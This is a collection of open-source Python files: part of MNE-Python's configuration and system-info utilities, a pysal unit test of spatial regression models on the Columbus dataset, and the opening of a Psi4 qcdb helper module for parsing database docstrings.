cache_dir : str or None
Directory to use for temporary file storage. None disables
temporary file storage.
"""
if cache_dir is not None and not op.exists(cache_dir):
raise IOError('Directory %s does not exist' % cache_dir)
set_config('MNE_CACHE_DIR', cache_dir, set_env=False)
def set_memmap_min_size(memmap_min_size):
"""Set the minimum size for memmaping of arrays for parallel processing.
Parameters
----------
memmap_min_size : str or None
Threshold on the minimum size of arrays that triggers automated memory
mapping for parallel processing, e.g., '1M' for 1 megabyte.
Use None to disable memmaping of large arrays.
"""
if memmap_min_size is not None:
if not isinstance(memmap_min_size, str):
raise ValueError('\'memmap_min_size\' has to be a string.')
if memmap_min_size[-1] not in ['K', 'M', 'G']:
raise ValueError('The size has to be given in kilo-, mega-, or '
'gigabytes, e.g., 100K, 500M, 1G.')
set_config('MNE_MEMMAP_MIN_SIZE', memmap_min_size, set_env=False)
# List the known configuration values
known_config_types = (
'MNE_3D_OPTION_ANTIALIAS',
'MNE_BROWSE_RAW_SIZE',
'MNE_BROWSE_BACKEND',
'MNE_CACHE_DIR',
'MNE_COREG_ADVANCED_RENDERING',
'MNE_COREG_COPY_ANNOT',
'MNE_COREG_GUESS_MRI_SUBJECT',
'MNE_COREG_HEAD_HIGH_RES',
'MNE_COREG_HEAD_OPACITY',
'MNE_COREG_HEAD_INSIDE',
'MNE_COREG_INTERACTION',
'MNE_COREG_MARK_INSIDE',
'MNE_COREG_PREPARE_BEM',
'MNE_COREG_PROJECT_EEG',
'MNE_COREG_ORIENT_TO_SURFACE',
'MNE_COREG_SCALE_LABELS',
'MNE_COREG_SCALE_BY_DISTANCE',
'MNE_COREG_SCENE_SCALE',
'MNE_COREG_WINDOW_HEIGHT',
'MNE_COREG_WINDOW_WIDTH',
'MNE_COREG_SUBJECTS_DIR',
'MNE_CUDA_DEVICE',
'MNE_CUDA_IGNORE_PRECISION',
'MNE_DATA',
'MNE_DATASETS_BRAINSTORM_PATH',
'MNE_DATASETS_EEGBCI_PATH',
'MNE_DATASETS_EPILEPSY_ECOG_PATH',
'MNE_DATASETS_HF_SEF_PATH',
'MNE_DATASETS_MEGSIM_PATH',
'MNE_DATASETS_MISC_PATH',
'MNE_DATASETS_MTRF_PATH',
'MNE_DATASETS_SAMPLE_PATH',
'MNE_DATASETS_SOMATO_PATH',
'MNE_DATASETS_MULTIMODAL_PATH',
'MNE_DATASETS_FNIRS_MOTOR_PATH',
'MNE_DATASETS_OPM_PATH',
'MNE_DATASETS_SPM_FACE_DATASETS_TESTS',
'MNE_DATASETS_SPM_FACE_PATH',
'MNE_DATASETS_TESTING_PATH',
'MNE_DATASETS_VISUAL_92_CATEGORIES_PATH',
'MNE_DATASETS_KILOWORD_PATH',
'MNE_DATASETS_FIELDTRIP_CMC_PATH',
'MNE_DATASETS_PHANTOM_4DBTI_PATH',
'MNE_DATASETS_LIMO_PATH',
'MNE_DATASETS_REFMEG_NOISE_PATH',
'MNE_DATASETS_SSVEP_PATH',
'MNE_DATASETS_ERP_CORE_PATH',
'MNE_FORCE_SERIAL',
'MNE_KIT2FIFF_STIM_CHANNELS',
'MNE_KIT2FIFF_STIM_CHANNEL_CODING',
'MNE_KIT2FIFF_STIM_CHANNEL_SLOPE',
'MNE_KIT2FIFF_STIM_CHANNEL_THRESHOLD',
'MNE_LOGGING_LEVEL',
'MNE_MEMMAP_MIN_SIZE',
'MNE_SKIP_FTP_TESTS',
'MNE_SKIP_NETWORK_TESTS',
'MNE_SKIP_TESTING_DATASET_TESTS',
'MNE_STIM_CHANNEL',
'MNE_TQDM',
'MNE_USE_CUDA',
'MNE_USE_NUMBA',
'SUBJECTS_DIR',
)
# These allow for partial matches, e.g. 'MNE_STIM_CHANNEL_1' is okay key
known_config_wildcards = (
'MNE_STIM_CHANNEL',
)
def _load_config(config_path, raise_error=False):
"""Safely load a config file."""
with open(config_path, 'r') as fid:
try:
config = json.load(fid)
except ValueError:
# No JSON object could be decoded --> corrupt file?
msg = ('The MNE-Python config file (%s) is not a valid JSON '
'file and might be corrupted' % config_path)
if raise_error:
raise RuntimeError(msg)
warn(msg)
config = dict()
return config
def get_config_path(home_dir=None):
r"""Get path to standard mne-python config file.
Parameters
----------
home_dir : str | None
The folder that contains the .mne config folder.
If None, it is found automatically.
Returns
-------
config_path : str
The path to the mne-python configuration file. On windows, this
will be '%USERPROFILE%\.mne\mne-python.json'. On every other
system, this will be ~/.mne/mne-python.json.
"""
val = op.join(_get_extra_data_path(home_dir=home_dir),
'mne-python.json')
return val
def get_config(key=None, default=None, raise_error=False, home_dir=None,
use_env=True):
"""Read MNE-Python preferences from environment or config file.
Parameters
----------
key : None | str
The preference key to look for. The os environment is searched first,
then the mne-python config file is parsed.
If None, all the config parameters present in environment variables or
the path are returned. If key is an empty string, a list of all valid
keys (but not values) is returned.
default : str | None
Value to return if the key is not found.
raise_error : bool
If True, raise an error if the key is not found (instead of returning
default).
home_dir : str | None
The folder that contains the .mne config folder.
If None, it is found automatically.
use_env : bool
If True, consider env vars, if available.
If False, only use MNE-Python configuration file values.
.. versionadded:: 0.18
Returns
-------
value : dict | str | None
The preference key value.
See Also
--------
set_config
"""
_validate_type(key, (str, type(None)), "key", 'string or None')
if key == '':
return known_config_types
# first, check to see if key is in env
if use_env and key is not None and key in os.environ:
return os.environ[key]
# second, look for it in mne-python config file
config_path = get_config_path(home_dir=home_dir)
if not op.isfile(config_path):
config = {}
else:
config = _load_config(config_path)
if key is None:
# update config with environment variables
if use_env:
env_keys = (set(config).union(known_config_types).
intersection(os.environ))
config.update({key: os.environ[key] for key in env_keys})
return config
elif raise_error is True and key not in config:
loc_env = 'the environment or in the ' if use_env else ''
meth_env = ('either os.environ["%s"] = VALUE for a temporary '
'solution, or ' % key) if use_env else ''
extra_env = (' You can also set the environment variable before '
'running python.' if use_env else '')
meth_file = ('mne.utils.set_config("%s", VALUE, set_env=True) '
'for a permanent one' % key)
raise KeyError('Key "%s" not found in %s'
'the mne-python config file (%s). '
'Try %s%s.%s'
% (key, loc_env, config_path, meth_env, meth_file,
extra_env))
else:
return config.get(key, default)
def set_config(key, value, home_dir=None, set_env=True):
"""Set a MNE-Python preference key in the config file and environment.
Parameters
----------
key : str
The preference key to set.
value : str | None
The value to assign to the preference key. If None, the key is
deleted.
home_dir : str | None
The folder that contains the .mne config folder.
If None, it is found automatically.
set_env : bool
If True (default), update :data:`os.environ` in addition to
updating the MNE-Python config file.
See Also
--------
get_config
"""
_validate_type(key, 'str', "key")
# While JSON allow non-string types, we allow users to override config
# settings using env, which are strings, so we enforce that here
_validate_type(value, (str, 'path-like', type(None)), 'value')
if value is not None:
value = str(value)
if key not in known_config_types and not \
any(k in key for k in known_config_wildcards):
warn('Setting non-standard config type: "%s"' % key)
# Read all previous values
config_path = get_config_path(home_dir=home_dir)
if op.isfile(config_path):
config = _load_config(config_path, raise_error=True)
else:
config = dict()
logger.info('Attempting to create new mne-python configuration '
'file:\n%s' % config_path)
if value is None:
config.pop(key, None)
if set_env and key in os.environ:
del os.environ[key]
else:
config[key] = value
if set_env:
os.environ[key] = value
# Write all values. This may fail if the default directory is not
# writeable.
directory = op.dirname(config_path)
if not op.isdir(directory):
os.mkdir(directory)
with open(config_path, 'w') as fid:
json.dump(config, fid, sort_keys=True, indent=0)
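# Minimal usage sketch for the two functions above (example values only):
#
#   from mne import set_config, get_config
#   set_config('MNE_LOGGING_LEVEL', 'warning')       # config file + os.environ
#   get_config('MNE_LOGGING_LEVEL')                  # -> 'warning'
#   get_config('MNE_LOGGING_LEVEL', default='info')  # fallback if unset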
def _get_extra_data_path(home_dir=None):
"""Get path to extra data (config, tables, etc.)."""
global _temp_home_dir
if home_dir is None:
home_dir = os.environ.get('_MNE_FAKE_HOME_DIR')
if home_dir is None:
# this has been checked on OSX64, Linux64, and Win32
if 'nt' == os.name.lower():
if op.isdir(op.join(os.getenv('APPDATA'), '.mne')):
home_dir = os.getenv('APPDATA')
else:
home_dir = os.getenv('USERPROFILE')
else:
# This is a more robust way of getting the user's home folder on
# Linux platforms (not sure about OSX, Unix or BSD) than checking
# the HOME environment variable. If the user is running some sort
# of script that isn't launched via the command line (e.g. a script
# launched via Upstart) then the HOME environment variable will
# not be set.
if os.getenv('MNE_DONTWRITE_HOME', '') == 'true':
if _temp_home_dir is None:
_temp_home_dir = tempfile.mkdtemp()
atexit.register(partial(shutil.rmtree, _temp_home_dir,
ignore_errors=True))
home_dir = _temp_home_dir
else:
home_dir = os.path.expanduser('~')
if home_dir is None:
raise ValueError('mne-python config file path could '
'not be determined, please report this '
'error to mne-python developers')
return op.join(home_dir, '.mne')
def get_subjects_dir(subjects_dir=None, raise_error=False):
"""Safely use subjects_dir input to return SUBJECTS_DIR.
Parameters
----------
subjects_dir : str | None
If a value is provided, return subjects_dir. Otherwise, look for
SUBJECTS_DIR config and return the result.
raise_error : bool
If True, raise a KeyError if no value for SUBJECTS_DIR can be found
(instead of returning None).
Returns
-------
value : str | None
The SUBJECTS_DIR value.
"""
_validate_type(item=subjects_dir, types=('path-like', None),
item_name='subjects_dir', type_name='str or path-like')
if subjects_dir is None:
subjects_dir = get_config('SUBJECTS_DIR', raise_error=raise_error)
if subjects_dir is not None:
subjects_dir = _check_fname(
fname=subjects_dir, overwrite='read', must_exist=True,
need_dir=True, name='subjects_dir'
)
return subjects_dir
@fill_doc
def _get_stim_channel(stim_channel, info, raise_error=True):
"""Determine the appropriate stim_channel.
First, 'MNE_STIM_CHANNEL', 'MNE_STIM_CHANNEL_1', 'MNE_STIM_CHANNEL_2', etc.
are read. If these are not found, it will fall back to 'STI 014' if
present, then fall back to the first channel of type 'stim', if present.
Parameters
----------
stim_channel : str | list of str | None
The stim channel selected by the user.
%(info_not_none)s
Returns
-------
stim_channel : str | list of str
The name of the stim channel(s) to use
"""
if stim_channel is not None:
if not isinstance(stim_channel, list):
_validate_type(stim_channel, 'str', "Stim channel")
stim_channel = [stim_channel]
for channel in stim_channel:
_validate_type(channel, 'str', "Each provided stim channel")
return stim_channel
stim_channel = list()
ch_count = 0
ch = get_config('MNE_STIM_CHANNEL')
    while ch is not None and ch in info['ch_names']:
stim_channel.append(ch)
ch_count += 1
ch = get_config('MNE_STIM_CHANNEL_%d' % ch_count)
if ch_count > 0:
return stim_channel
if 'STI101' in info['ch_names']: # combination channel for newer systems
return ['STI101']
if 'STI 014' in info['ch_names']: # for older systems
return ['STI 014']
from ..io.pick import pick_types
stim_channel = pick_types(info, meg=False, ref_meg=False, stim=True)
if len(stim_channel) > 0:
stim_channel = [info['ch_names'][ch_] for ch_ in stim_channel]
elif raise_error:
raise ValueError("No stim channels found. Consider specifying them "
"manually using the 'stim_channel' parameter.")
return stim_channel
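# --- Hedged usage sketch (not part of the original module) ------------------
# Demonstrates the fallback order documented above with a synthetic Info
# object; assumes no MNE_STIM_CHANNEL config is set, so the legacy 'STI 014'
# name wins over the generic stim-type picks.
def _stim_channel_sketch():
    import mne
    info = mne.create_info(['EEG 001', 'STI 014', 'STI 015'], sfreq=1000.,
                           ch_types=['eeg', 'stim', 'stim'])
    return _get_stim_channel(None, info)  # expected: ['STI 014']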
def _get_root_dir():
"""Get as close to the repo root as possible."""
root_dir = op.abspath(op.join(op.dirname(__file__), '..'))
up_dir = op.join(root_dir, '..')
if op.isfile(op.join(up_dir, 'setup.py')) and all(
op.isdir(op.join(up_dir, x)) for x in ('mne', 'examples', 'doc')):
root_dir = op.abspath(up_dir)
return root_dir
def _get_numpy_libs():
from ._testing import SilenceStdout
with SilenceStdout(close=False) as capture:
np.show_config()
lines = capture.getvalue().split('\n')
capture.close()
libs = []
for li, line in enumerate(lines):
for key in ('lapack', 'blas'):
if line.startswith('%s_opt_info' % key):
lib = lines[li + 1]
if 'NOT AVAILABLE' in lib:
lib = 'unknown'
else:
try:
lib = lib.split('[')[1].split("'")[1]
except IndexError:
pass # keep whatever it was
libs += ['%s=%s' % (key, lib)]
libs = ', '.join(libs)
return libs
def sys_info(fid=None, show_paths=False, *, dependencies='user'):
"""Print the system information for debugging.
This function is useful for printing system information
to help triage bugs.
Parameters
----------
fid : file-like | None
The file to write to. Will be passed to :func:`print()`.
Can be None to use :data:`sys.stdout`.
show_paths : bool
If True, print paths for each module.
dependencies : str
Can be "user" (default) to show user-relevant dependencies, or
"developer" to additionally show developer dependencies.
.. versionadded:: 0.24
Examples
--------
Running this function with no arguments prints an output that is
useful when submitting bug reports::
>>> import mne
>>> mne.sys_info() # doctest: +SKIP
Platform: Linux-4.15.0-1067-aws-x86_64-with-glibc2.2.5
Python: 3.8.1 (default, Feb 2 2020, 08:37:37) [GCC 8.3.0]
Executable: /usr/local/bin/python
CPU: : 36 cores
Memory: 68.7 GB
mne: 0.21.dev0
numpy: 1.19.0 {blas=openblas, lapack=openblas}
scipy: 1.5.1
matplotlib: 3.2.2 {backend=Qt5Agg}
sklearn: 0.23.1
numba: 0.50.1
nibabel: 3.1.1
nilearn: 0.7.0
dipy: 1.1.1
cupy: Not found
pandas: 1.0.5
mayavi: Not found
pyvista: 0.25.3 {pyvistaqt=0.1.1, OpenGL 3.3 (Core Profile) Mesa 18.3.6 via llvmpipe (LLVM 7.0, 256 bits)}
vtk: 9.0.1
PyQt5: 5.15.0
pooch: v1.5.1
""" # noqa: E501
_validate_type(dependencies, str)
_check_option('dependencies', dependencies, ('user', 'developer'))
ljust = 21 if dependencies == 'developer' else 15
platform_str = platform.platform()
if platform.system() == 'Darwin' and sys.version_info[:2] < (3, 8):
# platform.platform() in Python < 3.8 doesn't call
# platform.mac_ver() if we're on Darwin, so we don't get a nice macOS
# version number. Therefore, let's do this manually here.
macos_ver = platform.mac_ver()[0]
macos_architecture = re.findall('Darwin-.*?-(.*)', platform_str)
if macos_architecture:
macos_architecture = macos_architecture[0]
platform_str = f'macOS-{macos_ver}-{macos_architecture}'
del macos_ver, macos_architecture
out = 'Platform:'.ljust(ljust) + platform_str + '\n'
out += 'Python:'.ljust(ljust) + str(sys.version).replace('\n', ' ') + '\n'
out += 'Executable:'.ljust(ljust) + sys.executable + '\n'
out += 'CPU:'.ljust(ljust) + ('%s: ' % platform.processor())
try:
import multiprocessing
except ImportError:
out += ('number of processors unavailable ' +
'(requires "multiprocessing" package)\n')
else:
out += '%s cores\n' % multiprocessing.cpu_count()
out += 'Memory:'.ljust(ljust)
try:
import psutil
except ImportError:
out += 'Unavailable (requires "psutil" package)'
else:
out += '%0.1f GB\n' % (psutil.virtual_memory().total / float(2 ** 30),)
out += '\n'
libs = _get_numpy_libs()
use_mod_names = ('mne', 'numpy', 'scipy', 'matplotlib', '', 'sklearn',
'numba', 'nibabel', 'nilearn', 'dipy', 'cupy', 'pandas',
'mayavi', 'pyvista', 'pyvistaqt', 'ipyvtklink', 'vtk',
'PyQt5', 'ipympl')
if dependencies == 'developer':
use_mod_names += (
'', 'sphinx', 'sphinx_gallery', 'numpydoc', 'pydata_sphinx_theme',
'mne_bids', 'pytest', 'nbclient')
for mod_name in use_mod_names:
if mod_name == '':
out += '\n'
continue
out += ('%s:' % mod_name).ljust(ljust)
try:
mod = __import__(mod_name)
if mod_name == 'mayavi':
# the real test
from mayavi import mlab # noqa, analysis:ignore
except Exception:
out += 'Not found\n'
else:
extra = ''
if mod_name == 'numpy':
extra += ' {%s}%s' % (libs, extra)
elif mod_name == 'matplotlib':
extra += ' {backend=%s}%s' % (mod.get_backend(), extra)
elif mod_name == 'pyvista':
try:
from pyvista import GPUInfo
except ImportError:
pass
else:
gi = GPUInfo()
extra += f' {{OpenGL {gi.version} via {gi.renderer}}}'
if mod_name == 'vtk':
version = mod.vtkVersion()
# 9.0 dev has VersionFull but 9.0 doesn't
for attr in ('GetVTKVersionFull', 'GetVTKVersion'):
if hasattr(version, attr):
version = getattr(version, attr)()
break
elif mod_name == 'PyQt5':
version = _check_pyqt5_version()
else:
version = mod.__version__
if show_paths:
extra += f'\n{" " * ljust}•{op.dirname(mod.__file__)}'
out += '%s%s\n' % (version, extra)
print(out, end='', file=fid)
| bloyl/mne-python | mne/utils/config.py | Python | bsd-3-clause | 20,862 | ["Mayavi", "VTK"] | a60932d1fd722311baf7472bafba3fe5d7feeb6029d765e1f3eb23344e3b62bb |
import unittest
import pysal
import numpy as np
from scipy import sparse
#from pysal.spreg import error_sp_het as HET
from functools import partial
from pysal.contrib.handler import Model
GM_Error_Het = partial(Model, mtype='GM_Error_Het')
GM_Endog_Error_Het = partial(Model, mtype='GM_Endog_Error_Het')
GM_Combo_Het = partial(Model, mtype='GM_Combo_Het')
class TestGMErrorHet(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
X.append(db.by_col("CRIME"))
self.X = np.array(X).T
self.X = sparse.csr_matrix(self.X)
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
reg = GM_Error_Het(self.y, self.X, self.w, step1c=True)
betas = np.array([[ 47.99626638], [ 0.71048989], [ -0.55876126], [ 0.41178776]])
np.testing.assert_array_almost_equal(reg.betas,betas,7)
u = np.array([ 27.38122697])
np.testing.assert_array_almost_equal(reg.u[0],u,7)
ef = np.array([ 32.29765975])
np.testing.assert_array_almost_equal(reg.e_filtered[0],ef,7)
predy = np.array([ 53.08577603])
np.testing.assert_array_almost_equal(reg.predy[0],predy,7)
n = 49
self.assertAlmostEqual(reg.n,n)
k = 3
self.assertAlmostEqual(reg.k,k)
y = np.array([ 80.467003])
np.testing.assert_array_almost_equal(reg.y[0],y,7)
x = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_array_almost_equal(reg.x[0].toarray()[0],x,7)
i_s = 'Maximum number of iterations reached.'
np.testing.assert_string_equal(reg.iter_stop,i_s)
its = 1
self.assertAlmostEqual(reg.iteration,its,7)
my = 38.436224469387746
self.assertAlmostEqual(reg.mean_y,my)
stdy = 18.466069465206047
self.assertAlmostEqual(reg.std_y,stdy)
vm = np.array([[ 1.31767529e+02, -3.58368748e+00, -1.65090647e+00,
0.00000000e+00],
[ -3.58368748e+00, 1.35513711e-01, 3.77539055e-02,
0.00000000e+00],
[ -1.65090647e+00, 3.77539055e-02, 2.61042702e-02,
0.00000000e+00],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
2.82398517e-02]])
np.testing.assert_array_almost_equal(reg.vm,vm,6)
pr2 = 0.34951013222581306
self.assertAlmostEqual(reg.pr2,pr2)
stde = np.array([ 11.47900385, 0.36812187, 0.16156816, 0.16804717])
np.testing.assert_array_almost_equal(reg.std_err,stde,4)
z_stat = np.array([[ 4.18122226e+00, 2.89946274e-05],
[ 1.93003988e+00, 5.36018970e-02],
[ -3.45836247e+00, 5.43469673e-04],
[ 2.45042960e+00, 1.42685863e-02]])
np.testing.assert_array_almost_equal(reg.z_stat,z_stat,4)
xtx = np.array([[ 4.90000000e+01, 7.04371999e+02, 1.72131237e+03],
[ 7.04371999e+02, 1.16866734e+04, 2.15575320e+04],
[ 1.72131237e+03, 2.15575320e+04, 7.39058986e+04]])
np.testing.assert_array_almost_equal(reg.xtx,xtx,4)
class TestGMEndogErrorHet(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
self.X = np.array(X).T
self.X = sparse.csr_matrix(self.X)
yd = []
yd.append(db.by_col("CRIME"))
self.yd = np.array(yd).T
q = []
q.append(db.by_col("DISCBD"))
self.q = np.array(q).T
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
reg = GM_Endog_Error_Het(self.y, self.X, self.yd, self.q, self.w, step1c=True)
betas = np.array([[ 55.39707924], [ 0.46563046], [ -0.67038326], [ 0.41135023]])
np.testing.assert_array_almost_equal(reg.betas,betas,7)
u = np.array([ 26.51812895])
np.testing.assert_array_almost_equal(reg.u[0],u,7)
predy = np.array([ 53.94887405])
np.testing.assert_array_almost_equal(reg.predy[0],predy,7)
n = 49
self.assertAlmostEqual(reg.n,n)
k = 3
self.assertAlmostEqual(reg.k,k)
y = np.array([ 80.467003])
np.testing.assert_array_almost_equal(reg.y[0],y,7)
x = np.array([ 1. , 19.531])
np.testing.assert_array_almost_equal(reg.x[0].toarray()[0],x,7)
yend = np.array([ 15.72598])
np.testing.assert_array_almost_equal(reg.yend[0],yend,7)
q = np.array([ 5.03])
np.testing.assert_array_almost_equal(reg.q[0],q,7)
z = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_array_almost_equal(reg.z[0].toarray()[0],z,7)
h = np.array([ 1. , 19.531, 5.03 ])
np.testing.assert_array_almost_equal(reg.h[0].toarray()[0],h,7)
i_s = 'Maximum number of iterations reached.'
np.testing.assert_string_equal(reg.iter_stop,i_s)
its = 1
self.assertAlmostEqual(reg.iteration,its,7)
my = 38.436224469387746
self.assertAlmostEqual(reg.mean_y,my)
stdy = 18.466069465206047
self.assertAlmostEqual(reg.std_y,stdy)
vm = np.array([[ 8.34637805e+02, -2.16932259e+01, -1.33327894e+01,
1.65840848e+00],
[ -2.16932259e+01, 5.97683070e-01, 3.39503523e-01,
-3.90111107e-02],
[ -1.33327894e+01, 3.39503523e-01, 2.19008080e-01,
-2.81929695e-02],
[ 1.65840848e+00, -3.90111107e-02, -2.81929695e-02,
3.15686105e-02]])
np.testing.assert_array_almost_equal(reg.vm,vm,6)
pr2 = 0.34648011338954804
self.assertAlmostEqual(reg.pr2,pr2,7)
std_err = np.array([ 28.89009873, 0.77309965, 0.46798299,
0.17767558])
np.testing.assert_array_almost_equal(reg.std_err,std_err,6)
z_stat = np.array([(1.9175109006819244, 0.055173057472126787), (0.60229035155742305, 0.54698088217644414), (-1.4324949211864271, 0.15200223057569454), (2.3151759776869496, 0.020603303355572443)])
np.testing.assert_array_almost_equal(reg.z_stat,z_stat,6)
hth = np.array([[ 49. , 704.371999 , 139.75 ],
[ 704.371999 , 11686.67338121, 2246.12800625],
[ 139.75 , 2246.12800625, 498.5851 ]])
np.testing.assert_array_almost_equal(reg.hth,hth,6)
class TestGMComboHet(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
X.append(db.by_col("CRIME"))
self.X = np.array(X).T
self.X = sparse.csr_matrix(self.X)
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
# Only spatial lag
reg = GM_Combo_Het(self.y, self.X, w=self.w, step1c=True)
betas = np.array([[ 57.7778574 ], [ 0.73034922], [ -0.59257362], [ -0.2230231 ], [ 0.56636724]])
np.testing.assert_array_almost_equal(reg.betas,betas,7)
u = np.array([ 25.65156033])
np.testing.assert_array_almost_equal(reg.u[0],u,7)
ef = np.array([ 31.87664403])
np.testing.assert_array_almost_equal(reg.e_filtered[0],ef,7)
ep = np.array([ 28.30648145])
np.testing.assert_array_almost_equal(reg.e_pred[0],ep,7)
pe = np.array([ 52.16052155])
np.testing.assert_array_almost_equal(reg.predy_e[0],pe,7)
predy = np.array([ 54.81544267])
np.testing.assert_array_almost_equal(reg.predy[0],predy,7)
n = 49
self.assertAlmostEqual(reg.n,n)
k = 4
self.assertAlmostEqual(reg.k,k)
y = np.array([ 80.467003])
np.testing.assert_array_almost_equal(reg.y[0],y,7)
x = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_array_almost_equal(reg.x[0].toarray()[0],x,7)
yend = np.array([ 35.4585005])
np.testing.assert_array_almost_equal(reg.yend[0],yend,7)
q = np.array([ 18.594 , 24.7142675])
np.testing.assert_array_almost_equal(reg.q[0].toarray()[0],q,7)
z = np.array([ 1. , 19.531 , 15.72598 , 35.4585005])
np.testing.assert_array_almost_equal(reg.z[0].toarray()[0],z,7)
i_s = 'Maximum number of iterations reached.'
np.testing.assert_string_equal(reg.iter_stop,i_s)
its = 1
self.assertAlmostEqual(reg.iteration,its,7)
my = 38.436224469387746
self.assertAlmostEqual(reg.mean_y,my)
stdy = 18.466069465206047
self.assertAlmostEqual(reg.std_y,stdy)
vm = np.array([[ 4.86218274e+02, -2.77268729e+00, -1.59987770e+00,
-1.01969471e+01, 2.74302006e+00],
[ -2.77268729e+00, 1.04680972e-01, 2.51172238e-02,
1.95136385e-03, 3.70052723e-03],
[ -1.59987770e+00, 2.51172238e-02, 2.15655720e-02,
7.65868344e-03, -7.30173070e-03],
[ -1.01969471e+01, 1.95136385e-03, 7.65868344e-03,
2.78273684e-01, -6.89402590e-02],
[ 2.74302006e+00, 3.70052723e-03, -7.30173070e-03,
-6.89402590e-02, 7.12034037e-02]])
np.testing.assert_array_almost_equal(reg.vm,vm,6)
pr2 = 0.3001582877472412
self.assertAlmostEqual(reg.pr2,pr2,7)
pr2_e = 0.35613102283621967
self.assertAlmostEqual(reg.pr2_e,pr2_e,7)
std_err = np.array([ 22.05035768, 0.32354439, 0.14685221, 0.52751653, 0.26683966])
np.testing.assert_array_almost_equal(reg.std_err,std_err,6)
z_stat = np.array([(2.6202684885795335, 0.00878605635338265), (2.2573385444145524, 0.023986928627746887), (-4.0351698589183433, 5.456281036278686e-05), (-0.42277935292121521, 0.67245625315942159), (2.1225002455741895, 0.033795752094112265)])
np.testing.assert_array_almost_equal(reg.z_stat,z_stat,6)
hth = np.array([[ 4.90000000e+01, 7.04371999e+02, 1.72131237e+03,
7.24743592e+02, 1.70735413e+03],
[ 7.04371999e+02, 1.16866734e+04, 2.15575320e+04,
1.10925200e+04, 2.23848036e+04],
[ 1.72131237e+03, 2.15575320e+04, 7.39058986e+04,
2.34796298e+04, 6.70145378e+04],
[ 7.24743592e+02, 1.10925200e+04, 2.34796298e+04,
1.16146226e+04, 2.30304624e+04],
[ 1.70735413e+03, 2.23848036e+04, 6.70145378e+04,
2.30304624e+04, 6.69879858e+04]])
np.testing.assert_array_almost_equal(reg.hth,hth,4)
if __name__ == '__main__':
unittest.main()
| TaylorOshan/pysal | pysal/contrib/handler/tests/test_error_spet_sparse.py | Python | bsd-3-clause | 11,099 | ["COLUMBUS"] | 3e2419d78dbb905d6516ea1cd9d1b14720b3504daceb06a80fdf91cc9248d90c |
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2021 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
r"""File to
"""
import sys
import os
import glob
import ast
def useful():
print("in qcdb.useful()")
return 'qcdb successfully accessed'
def drop_duplicates(seq):
"""Function that given an array or array of arrays *seq*, returns an
array without any duplicate entries. There is no guarantee of which
duplicate entry is dropped.
"""
noDupes = []
seq2 = sum(seq, [])
[noDupes.append(i) for i in seq2 if not noDupes.count(i)]
return noDupes
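# Hedged usage sketch (not part of the original module): nested input is
# flattened one level and the first occurrence of each entry is kept.
def _drop_duplicates_example():
    flat = drop_duplicates([[1, 2], [2, 3], [3, 4]])
    assert flat == [1, 2, 3, 4]
    return flat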
def dictify_database_docstrings():
    """Parse the docstrings of the qcdb database modules into a dictionary
    keyed by database name, each entry holding 'general', 'cp', 'rlxd',
    'benchmark' and 'subset' sections.
    """
db_path = os.path.dirname(__file__) + '/../databases'
DSD = {}
module_choices = []
for module in glob.glob(db_path + '/*.py'):
filename = os.path.split(module)[1]
basename = os.path.splitext(filename)[0]
div = '=' * len(basename)
module_choices.append(basename)
DSD[basename] = {}
M = ast.parse(''.join(open(module)))
DS = ast.get_docstring(M)
if not DS:
DS = ""
DS = str.replace(DS, '|dl|', '-->')
DS = str.replace(DS, '|dr|', '<--')
DS = str.replace(DS, "``'", '')
DS = str.replace(DS, "'``", '')
lst = DS.split("\n- **")
#DSD[basename]['general'] = str.replace(lst[0], '|', '')
DSD[basename]['general'] = lst[0].split('\n')
try:
DSD[basename]['cp'] = [section for section in lst if section.startswith("cp")][0]
except IndexError:
DSD[basename]['cp'] = None
try:
DSD[basename]['rlxd'] = [section for section in lst if section.startswith("rlxd")][0]
except IndexError:
DSD[basename]['rlxd'] = None
try:
DSD[basename]['benchmark'] = [section for section in lst if section.startswith("benchmark")][0]
except IndexError:
DSD[basename]['benchmark'] = None
try:
#DSD[basename]['subset'] = [section for section in lst if section.startswith("subset")][0]
temp = [section for section in lst if section.startswith("subset")][0].splitlines()
temp = temp[2:]
result = {}
for item in temp:
item = item.lstrip(" -")
try:
key, val = item.split(" ", 1)
result[key] = val
except ValueError:
result[item] = ""
DSD[basename]['subset'] = result
except IndexError:
DSD[basename]['subset'] = {"": 'No subsets available'}
return DSD
# print '\ngeneral\n\n', DSD[basename]['general']
# print '\ncp\n\n', DSD[basename]['cp']
# print '\nrlxd\n\n', DSD[basename]['rlxd']
# print '\nbenchmark\n\n', DSD[basename]['benchmark']
# print '\nsubset\n\n', DSD[basename]['subset']
#print ' %-12s %s' % ('[' + basename + ']', DSD[basename]['general'][0])
#print 'DSD2\n', DSD['S22']['subset']
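# Hedged usage sketch (not part of the original module); assumes the qcdb
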